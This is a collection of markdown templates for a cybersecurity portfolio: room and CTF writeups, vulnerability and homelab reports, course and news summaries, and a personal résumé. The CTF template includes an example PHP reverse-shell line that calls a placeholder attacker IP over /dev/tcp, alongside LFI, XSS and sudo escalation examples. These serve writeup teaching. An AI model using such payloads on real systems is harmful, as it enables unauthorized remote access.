# Templates

# Advent of Cyber

### Overview
---
**Room URL:**  
**Difficulty:**  
**Category:**  
**Date Completed:**  

### Objective
[Objective]

---
### Table of Contents
[Introduction](#bkmrk-introduction)  
[Walk Through](#bkmrk-walk-through)  
[Lessons Learned](#bkmrk-lessons-learned)  
[Resources](#bkmrk-resources)  

---
### Introduction
This is an introduction to the room.  

---
### Walk Through
This is the walkthrough section.

---
### Lessons Learned
- [Key takeaway]

---
### Resources
[TryHackMe](https://tryhackme.com)

# Vulnerability Write Up

**Date:** [YYYY-MM-DD]  
**Category:** [Penetration Testing / Web Application Security / Network Defense / Threat Analysis / etc.]  
**Tools Used:** [Nmap, Metasploit, Wireshark, Burp Suite, Python, etc.]  
**Target/Scope:** [Specify target system, application, or network segment]  

---

## 💡 Executive Summary

A brief, non-technical summary of the project's goal, the most significant findings, and the overall outcome.

* **Goal:** [Briefly state the objective, e.g., "Identify critical vulnerabilities in the X application's login mechanism."]
* **Key Finding:** [Highlight the most important discovery, e.g., "Discovered a high-severity SQL Injection."]
* **Outcome:** [Briefly state the result, e.g., "The vulnerability was successfully exploited, and a remediation strategy was developed."]

---

## 🔬 Methodology and Execution

Detail the steps taken, including reconnaissance, scanning, and exploitation phases.

### Phase 1: Reconnaissance

* **Initial Discovery:** [Briefly describe how the target was identified/accessed.]
* **Enumeration:** Used `[Tool Name]` to find:
    * Open Ports: [List ports]
    * Technologies: [List technologies, e.g., Apache 2.4.6, PHP 7.2]
    * [Other Key Information]

### Phase 2: Vulnerability Analysis

* **Vulnerability Name:** [Specific name, e.g., Cross-Site Scripting (XSS)]
* **Description:** [Explain what the vulnerability is and why it exists.]
* **CVE/CWE Reference (if applicable):** [e.g., CVE-2023-XXXXX or CWE-79]

### Phase 3: Proof of Concept (PoC)

Provide the exact steps and evidence (screenshots, code blocks) showing the exploitation.

1.  **Step 1:** [Action taken]
2.  **Step 2:** [Action taken, e.g., "Injected the payload: `[Payload]`"]
3.  **Result:** [Describe the outcome, e.g., "The browser successfully executed the script."]

> **Code Block Example (Payload):**
> ```html
> <script>alert('XSS Proof of Concept')</script>
> ```

---

## ✅ Remediation and Mitigation

What steps were recommended or taken to fix the issue?

* **Recommendation:** [Specific fix, e.g., "Implement proper input sanitization and use parameterized queries."]
* **Defense:** [General defense principle, e.g., "Follow the principle of least privilege for the database user."]
* **Impact:** [What was the business/security risk?]

---

## 🧠 Lessons Learned

What did you learn from this project?

* [Key technical skill refined]
* [Insight into defensive/offensive strategies]
* [Unexpected challenges encountered and overcome]

# Certification or Course Summary

**Completion Date:** [YYYY-MM-DD]  
**Issuing Body:** [CompTIA, Offensive Security, SANS, etc.]  
**Domain Focus:** [Network Security, Incident Response, Ethical Hacking, Cloud Security, etc.]  
**Portfolio Value:** [High/Medium - Why is this relevant?]  

---

## 🎯 Key Objectives

* [Objective 1: Summarize a major area covered]
* [Objective 2: Summarize another major area covered]
* [Objective 3: Summarize a major area covered]

---

## 🛠️ Core Skills Gained/Refined

### Network Security
* **Firewall Management:** Gained proficiency in configuring ACLs and NAT on [Cisco/Juniper/etc.] devices.
* **Protocol Analysis:** Deep dive into TCP/IP, understanding packet structure using **Wireshark**.

### Security Operations (SecOps)
* **SIEM Usage:** Experience in parsing logs and creating detection rules in **Splunk/ELK Stack**.
* **Incident Handling:** Applied the [NIST/SANS] Incident Response lifecycle to simulated scenarios.

---

## 📚 Significant Project or Lab

Briefly describe the most challenging or informative project/lab undertaken during the course.

* **Title:** [e.g., "Building an Active Directory Lab for Lateral Movement Simulation"]
* **Summary:** [2-3 sentences explaining the project and its outcome.]

---

## 🚀 Next Steps

How will you apply this knowledge?

* [Specific goal, e.g., "Apply these concepts to a real-world bug bounty target."]
* [Related certification or learning path]

# News/Research Summary

## 🚨 Analyzing the [Specific Event/CVE Title]

**Date Published:** [YYYY-MM-DD]  
**Topic:** [Supply Chain Attack / Critical Vulnerability / Ransomware Trend]  
**CVSS Score (if applicable):** [e.g., 9.8 (Critical)]  

---

## 🌍 What Happened?

A concise, accessible explanation of the event or vulnerability.

> **Quote/Key Fact:** "This vulnerability affects all unpatched versions of the [Software Name] from [Version] onwards, allowing for unauthenticated Remote Code Execution (RCE)."

---

## 💥 Technical Details and Impact

* **Affected Parties:** [List types of organizations or systems affected.]
* **Mechanism:** [Explain the technical root cause in simple terms. E.g., "A lack of proper bounds checking in the input buffer."]
* **Threat Actor (if known):** [e.g., Nation-state / Financially-motivated group]

---

## 🛠️ My Analysis and Mitigation Strategy

What does this mean for a security professional, and how should one respond?

1.  **Immediate Action:** Patching is critical. Prioritize systems that are [Public-facing / Contain sensitive data].
2.  **Detection:** Implement **IDS/IPS** signatures to watch for the exploit payload.
3.  **Proactive Defense:** Review the **Software Bill of Materials (SBOM)** to identify exposure to the vulnerable library.

---

## 🔮 Looking Forward

What is the long-term lesson?

* [Focus on better secure coding practices, stronger vendor scrutiny, etc.]

# CTF Writeup

**Event/Platform:** [Hack The Box / TryHackMe / PicoCTF / Local Event]  
**Date Solved:** [YYYY-MM-DD]  
**Category:** [Web / Reverse Engineering / Pwn / Crypto / Forensics / Misc]  
**Difficulty:** [Easy / Medium / Hard / Insane]  

---

## 🔍 Initial Discovery and Reconnaissance

How did you first approach the problem?

* **Target:** [IP Address / URL / File Name]
* **Initial Step:** [e.g., "Ran Nmap scan on all ports."]
* **Key Finding:** [The one piece of information that pointed you in the right direction, e.g., "Discovered a hidden `.git` directory."]

> **Code Block Example (Nmap Output):**
> ```bash
> # nmap -sC -sV [IP]
> PORT    STATE SERVICE VERSION
> 80/tcp  open  http    Apache httpd 2.4.41 ((Ubuntu))
> 22/tcp  open  ssh     OpenSSH 8.2p1 Ubuntu
> ```

---

## 🧩 Exploitation Path and Steps

Detail the logical sequence of steps that led to the flag. Break this down into smaller, digestible phases.

### Phase 1: Finding the Vulnerability (e.g., Web App)

* **Tool Used:** [Burp Suite / Dirb / Nikto]
* **Action:** [e.g., "Fuzzing a parameter in the contact form."]
* **Vulnerability Type:** [e.g., Local File Inclusion (LFI)]
* **Proof:** [e.g., "The application returned the contents of `/etc/passwd` when the payload `../../etc/passwd` was injected."]

### Phase 2: Gaining Access/Shell

* **Technique:** [e.g., "Used the LFI to access the log files and inject a PHP reverse shell."]
* **Payload/Command:**
    ```php
    <?php system("bash -c 'bash -i >& /dev/tcp/[ATTACKER_IP]/[PORT] 0>&1'"); ?>
    ```
* **Result:** [e.g., "Successfully obtained a low-privilege shell as user `www-data`."]

### Phase 3: Privilege Escalation (if necessary)

* **Method:** [e.g., Misconfigured SUID binary]
* **Tool:** [e.g., LinPEAS, manually checked `sudo -l`]
* **Final Action:** [Command used to escalate, e.g., `sudo /usr/bin/python3 /tmp/exploit.py`]

---

## 🏆 The Flag

Document the final steps and the flag itself.

* **Location:** [The file path or database table where the flag was found.]
* **Flag Value:** (Optional, often replace with `[FLAG REDACTED]`)
    ```
    FLAG{[REDACTED_EXAMPLE_FLAG]}
    ```

---

## 🧠 Key Takeaway

What specific technical or problem-solving concept did this challenge reinforce?

* [e.g., "Reinforced the importance of manual code review, as automated tools missed the vulnerability."]
* [e.g., "Learned a new technique for exploiting deserialization flaws in Python."]

# HomeLab

**Date:** [YYYY-MM-DD]  
**Objective:** [e.g., Design, build, and secure a virtual environment for malware analysis.]  
**Components:** [List major systems, e.g., pfSense Firewall, Kali VM, Windows Server 2022 AD, Splunk SIEM]  

---

## 🗺️ Architectural Design

Provide a high-level overview (a diagram works best here; embed it as an image).

### Network Topology

* **VLAN 10 (Management):** [Description of access and purpose]
* **VLAN 20 (Target/DMZ):** [Where vulnerable targets or public services reside]
* **VLAN 30 (Analysis/SIEM):** [Where monitoring tools are isolated]

[Image of the network diagram/topology]

---

## 🛠️ Security Control Implementation

Detail the specific defensive tools and configurations you implemented.

### 🛡️ Perimeter Defense (pfSense/Firewall)

| Control | Mechanism | Configuration Detail |
| :--- | :--- | :--- |
| **IDS/IPS** | **Snort/Suricata** | Configured ruleset for C2 and known exploit detection. |
| **Egress Filtering** | **Firewall Rules** | Blocking outbound traffic on ports that should never leave the lab (e.g., 25, 139, 445). |
| **VPN Access** | **OpenVPN** | Enforced 2FA and strong cryptography (`AES-256-GCM`). |

### 📊 Monitoring & Logging (SIEM)

* **SIEM Used:** [Splunk / ELK Stack / Security Onion]
* **Data Sources:** Ingested logs from:
    * Active Directory (Security Event Logs)
    * pfSense (Firewall logs)
    * Endpoint Protection ([e.g., Sysmon on Windows])
* **Detection Rules Created:** [e.g., "Alert on 10+ failed login attempts within 60 seconds."]

---

## 📈 Testing and Validation

How did you ensure the defenses were working?

* **Testing Method:** [e.g., Ran a controlled **Metasploit** attack from the Kali VM to the Target VM.]
* **Validation:** [e.g., "Confirmed that the Snort IDS successfully blocked the initial exploit attempt and logged the traffic."]
* **Post-Mortem:** [e.g., "Found a bypass path, requiring a rule change in the firewall."]

---

## 📚 Technical Learnings

* [Specific command or configuration learned, e.g., "Mastered the use of `rsyslog` for centralized logging."]
* [Insight into enterprise-level challenges, e.g., "The difficulty of correctly tuning SIEM rules to avoid false positives."]

# THM Template

### Overview
---
**Room URL:** [Room URL]  
**Difficulty:** [Easy/Medium/Hard]  
**Category:** [Category]  
**Date Completed:** [Date]  

### Objective
[Brief description of what the room teaches and the main goals]

---

### Table of Contents
[Introduction](#bkmrk-introduction)  
[Walk Through](#bkmrk-walk-through)  
[Lessons Learned](#bkmrk-lessons-learned)  
[Resources](#bkmrk-resources)  

---

### Introduction

#### [Main Concept/Topic]

[Brief overview of what this topic is about]

#### Why This Matters

[Explain the real-world relevance and importance of this technique/concept]

---

#### Method/Technique 1: [Name]

**What is it?**  
[Explanation of the concept]

**Purpose:**  
[Why this technique is used]

**Tool/Method:**  
[Specific tools or approaches used]

**How it Works:**  
[Step-by-step explanation of the methodology]

---

#### Method/Technique 2: [Name]

**What is it?**  
[Explanation of the concept]

**Why [Relevant Question]?**  
[Explanation]

**Common Tools:**
- [Tool 1] - [Description]
- [Tool 2] - [Description]
- [Tool 3] - [Description]

**How it Works:**  
[Step-by-step explanation of the methodology]

---

#### Method/Technique 3: [Name]

**What is it?**  
[Explanation of the concept]

**Tools:**  
[Description of tools and their capabilities]

---

#### Method/Technique 4: [Name]

**The Concept:**  
[Explanation of core concept]

**Where/How [Relevant Detail]:**
- [Point 1]
- [Point 2]
- [Point 3]

**The Attack Method:**  
[Explanation of how to exploit/use this]

**Tool: [Tool Name]**

[Brief description of the tool]

**Basic Syntax:**
```bash
[command syntax]
```

**Key Flags/Options:**
- `[flag]`: [Description]
- `[flag]`: [Description]
- `[flag]`: [Description]

**Important Considerations:**  
[Any caveats, filtering needs, or special notes]

---

### Walk Through

#### Task 1: [Task Name]

[Step-by-step instructions]
1. [Step 1]
2. [Step 2]
3. [Step 3]

**Answer:** `[answer]`

---

#### Task 2: [Task Name]

[Step-by-step instructions]
1. [Step 1]
2. [Step 2]
3. [Step 3]

**Answer:** `[answer]`

---

#### Task 3: [Task Name]

[Step-by-step instructions]
1. [Step 1]
2. [Step 2]
3. [Step 3]

**Answer:** `[answer]`

---

#### Task 4: [Task Name]

**Step 1: [Sub-step Name]**
```bash
[command]
```

- [Explanation point 1]
- [Explanation point 2]

**Step 2: [Sub-step Name]**
```bash
[command]
```

- [Explanation point 1]
- [Explanation point 2]
- [Explanation point 3]

**Answers:**  
[Question 1]: `[answer]`  
[Question 2]: `[answer]`

---

### Lessons Learned

- [Key takeaway 1]
- [Key takeaway 2]
- [Key takeaway 3]
- [Key takeaway 4]
- [Key takeaway 5]
- [Key takeaway 6]
- [Key takeaway 7]
- [Key takeaway 8]

---

### Resources

[TryHackMe](https://tryhackme.com)  
[Resource 1 - Description](URL)  
[Resource 2 - Description](URL)  
[Resource 3 - Description](URL)  
[Resource 4 - Description](URL)  
[Resource 5 - Description](URL)  
[Resource 6 - Description](URL)

# Resume

# David Rizzo

**Cybersecurity Graduate • IT & Digital Forensics**

---

## Contact

- **Location:** Charlotte, North Carolina 28269
- **LinkedIn:** [linkedin.com/in/davidjrizzo1](https://linkedin.com/in/davidjrizzo1)
- **Portfolio:** [portfolio.rizzoit.com](https://portfolio.rizzoit.com)

---

## Summary

IT and cybersecurity professional with a strong foundation in technical support, system operations, and security principles. Experienced in troubleshooting, incident analysis, and maintaining reliable computing environments across Windows, Linux, and cloud platforms. Known for combining technical problem-solving with leadership, customer service, and clear communication in fast-paced environments.

---

## Skills

### IT & Systems
Technical Support, Troubleshooting, System Monitoring, Windows & Linux Administration

### Security
Security Operations, Vulnerability Assessment, IAM, Cryptography, Log Analysis

### Tools
Wireshark, Splunk, Burp Suite, Magnet AXIOM, FTK Imager, Docker

### Platforms
Windows, Linux (Kali, Ubuntu, Red Hat), macOS, AWS, Azure

---

## Education

### Bachelor of Science in Cybersecurity
**Wilmington University** — New Castle, DE  
*Concentration: Digital Forensics*

### Certificate in Cybersecurity & FinTech
**Wilmington University**

### Cybersecurity Certificate (24-Week Program)
**University of North Carolina at Charlotte**

---

## Experience

### Customer Service & Team Leadership
**Lowe's** — Concord, NC | 2020–2025

- Supported daily operations in high-volume environments while resolving customer and operational issues
- Led, coached, and supported teams of up to 30 associates
- Recognized for reliability, leadership, and customer satisfaction under pressure

### Videographer / Media Support
**Mecklenburg Community Church** — Charlotte, NC | 2019–2020

- Produced and edited weekly video content using Adobe Premiere Pro and After Effects
- Managed deadlines, collaborated with teams, and supported live-service operations

---

## Selected Technical Projects

### Digital Forensics Investigation
Evidence acquisition, artifact analysis, and formal reporting

### Red Team / Blue Team Lab
Simulated attacks and defensive monitoring using Kali & ELK

### Azure ELK Stack
Centralized logging, dashboards, and incident response